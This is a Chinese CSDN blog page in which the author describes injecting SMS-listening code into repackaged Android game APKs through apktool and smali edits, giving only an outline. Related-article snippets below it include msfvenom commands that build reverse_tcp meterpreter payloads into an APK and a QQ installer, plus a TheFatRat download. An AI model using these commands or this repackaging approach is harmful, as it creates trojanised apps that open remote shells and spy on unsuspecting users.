关于黑客在APK文件中植入木马的相关讲解

最新推荐文章于 2024-08-26 16:21:43 发布
最新推荐文章于 2024-08-26 16:21:43 发布
阅读量8.5k 收藏 11
点赞数 1
分类专栏: Android Android 文章标签: 黑客 木马 黑客入侵Android手机 游戏
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zeqblog/article/details/9762733
版权

      最近,成功在一些市场上的apk文件中植入自己的短信侦听的代码(还可以利用最简单的MainActivity来篡改启动程序。非恶意,反对通过此手段做一些不好的事情)比如:神庙逃亡2,fruit monkey等游戏(目测基本上所有游戏都可以植入)

     其实吧,在apk中植入自己的代码也不是很难,只需要网上一些普通的反编译工具比如:apktool,再加上自己的头脑,就可以了!!大笑一个apk文件反编译成的samli格式的文件,很难对它做修改,因为基本上看不懂~~但是你可以在smali文件中添加自己的smali格式的文件啊~~~~当然,选择这些smali格式的文件也是有讲究的,选的文件不要去动原apk中的文件就行了,xml清单文件可以修改滴~~~~

    好啦,点到为止,自己动手去试吧~·注:请原谅没把具体方法给大家,只给出了思路,是为了不想让一些不怀好意的人去做非法的事情~~请原谅~)

kyrin_云中鹤
关注
专栏目录
网站被篡改植入木马脚本,显示浏览器要升级等信息的原因说明和详细解决办法!
任聪聪的博客
06-21 1482
本篇文章主要讲解常见手机打开网页出现红包弹出框,或是浏览器弹出要更新的常见dns劫持问题的解决方法。 适用范围:web端所有的网站 日期:2021年6月21日 问题的截图展示: 就是上面这种,一般是黑客通过dns劫持或者网页篡改植入的无危害的js脚本病毒或者是有危害的js脚本病毒,常通过提示让用户误点下载流氓软件或者其他类型软件实现盈利。 一般造成的原因是:dns劫持、网页被篡改 一、提示浏览器版本过低的套路和解决方法 形式说明:提示浏览器版本过低,实际上是一个流氓软件,或者是其他的正常apk。 第一.
对 ArabicRSS APK 应用木马样本的分析
systemino的博客
11-15 460
水坑攻击(watering hole) 是近些年黑客攻击常用的方式之一,顾名思义,是在受害者必经之路设置了一个“水坑(陷阱)”。最常见的做法是,黑客分析攻击目标的上网活动规律,寻找攻击目标经常访问的网站的弱点,先将此网站“攻破”并植入攻击代码,一旦攻击目标访问该网站就会“招”。 由于此种攻击借助了目标团体所信任的网站,攻击成功率很高,即便是那些对鱼叉攻击或其他形式的钓鱼攻击具有防护能力的团体。其...
安卓木马demo_向安卓APK smali源码植入木马
weixin_40008870的博客
12-24 2297
向安卓APK smali源码植入木马反弹SHELL的测试代码【请勿用于非法目的,切记!】在安卓应用程序植入木马已经不是什么新鲜事情,下面给出一个demo 反弹shell的一个smali源码,可以直接插入到目标应用的smali源码,其第一部分为函数体。注意修改其的.line 行号。建议插入到一个smali文件的末尾,这样行号只要顺着原smali文件的行号增大即可。然后使用第二部分的源码进行...
Android发现恶意软件被植入木马
chengtiannen8716的博客
12-16 1197
根据国际先关的新闻报道,有安全人员发现了针对搭载Android系统的手机26款恶意软件,这些软件具有很高的危险性,其一项是注入恶意软件开发者的股票软件。该情况发现地点为俄罗斯,针对于基于台湾联发科芯片组的手机威胁性最大。 通过对这些恶意软件分析,一旦手机链接网络,木马病毒就会自动链接...
2024年最新kali Linux安装教程(超详细,图文并茂)_vm安装kali
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
08-26 2942
官网镜像链接:https://cdimage.kali.org/kali-2023.4/kali-linux-2023.4-vmware-amd64.7z注:本文采用导入虚拟机的方式来实现快捷安装123云盘文件:链接:https://www.123pan.com/s/cvBqVv-4FUXv.html提取码:c7mI阿里巴巴开源镜像站-OPSX镜像站-阿里云开发者社区 (aliyun.com)清华大学开源软件镜像站 | Tsinghua Open Source Mirror。
AndroidAPK 捆绑器的实现
tiandyoin的专栏
04-08 1万+
AndroidAPK 捆绑器的实现                    作者: 海东青 利用捆绑器向正常程序捆绑病毒、木马等恶意程序,以达到隐蔽安装、运行的目的,这 在 Windows 平台下是一种很常规的攻击手段。那么,在智能终端十分流行的今天,如何实 现针对手机应用的捆绑器呢?对此,本文针对 Android 平台的应用程序 APK 文件,给出了 类似 Windows 下捆绑器
小白尝试——在自己的apk添加马子
qq_44918093的博客
05-15 2312
起因 昨天写了个hello world apk,今天突然想,能不能在里边注入小马子玩玩,说干就干,不务正业的我又开始啦 工具 kali(我装在VM里) apktool Java环境 开始 先生成个木马,输入 msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx(你的kali的IP地址) LPORT=5555 R>/root/m.apk(也有可能由于没有安装msf而进入失败,输入这个命令安装就好apt install metasplo
简单的一次手机APK注入
AomCC的博客
08-23 1367
一次简单的手机APP木马注入
木马渗透安卓系统实验
polaris___的博客
05-30 4558
1.实验内容 Metasploit后门攻击实现远程控制Android手机 2.实验环境 设备 IP 子网掩码 Kali Linux(Hack) 222.20.78.6 255.255.248.0 Android(靶机) 10.11.6...
Msfvenom木马植入与隐藏实战详解
它可以生成各种格式的Payload,包括但不限于可执行文件、DLL文件、shellcode等。 #### 1.2 Msfvenom的功能与用途 Msfvenom主要用于渗透测试和黑客攻击,可以帮助渗透测试人员生成定制化的Payload进行漏洞利用测试和...
kali-TheFatRat木马生成工具安装及简单使用
热门推荐
qq_35258210的博客
02-10 1万+
kali终端下载 命令:git clone https://github.com/Screetsec/TheFatRat.git 推荐使用浏览器github上下载,比命令下载要快 浏览器下载:https://github.com/Screetsec/TheFatRat.git 下载完后将压缩包放到kali系统里 使用终端解压文件 命令:unzip 接下来要使用到的是这三个工具,我们想要使用先给它们添加可执行权限 命令:chmod +x setup.sh powerfull.s
捆绑机 免杀的,无需注册
05-17
捆绑机,万能的 图片,文件,文档都可以 捆绑机,万能的 图片,文件,文档都可以
apk 植入代码
hellolinshoujie的专栏
12-19 3547
使用工具: 1)apktool  将其解压缩文件和编译成apk 2)dex2jar  编码出其java源代码,用于了解其逻辑便于修改其文件 3)jd-gui   查看java源码 4)签名工具  给编译成的二次apk签名 用于安装 (这些工具除了最后一个 其他都可以在网上下载的) 5)eclipse  通过查看系统log输出 便于定位修改源 我们拿HelloWord.apk为例,
Androidapk动态载入技术研究(2)android插件化及实现
weixin_34168880的博客
06-02 62
   了解了android类载入的前期知识点后,来看看androidDexClassLoader详细的实现     详细载入流程例如以下:     宿主程序会到文件系统比方SD卡去载入APK【1】,然后通过一个叫proxy的Activity去运行apk的Activity     关于动态载入ap。理论上可用用到DexClassLoad、PathClassLoader、URLC...
伪装植入木马的常见方法
弈风的专栏
08-08 2845
鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。
java防报毒_解决反编译后的安卓apk会被报毒的方法
weixin_32349577的博客
02-26 2400
目前几种常用的反编译工具如ApkIDE、APKDB、Androidkiller及较早版本的ApkToolBox 等反编译某些安卓热门apk会被一些安全软件检测含有木马或恶意程序,产生误判误报。原因是一些手机上的安全软件如360等会将这些安卓热门apk的非官方签名列入了与安卓APK文件名一一对应黑名单,解决办法就是重新生成新的证书文件testkey.x509.pem和密钥文件testkey.pk8,...
手机远控apk木马/安卓远程木马-零开始网安知识点
2401_84915584的博客
06-17 1189
文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,
msf之木马程序
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
09-15 1万+
捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个QQ 把它上传到了root/dy/路径下 然后开始捆绑 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe -p:指定后面的pa
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值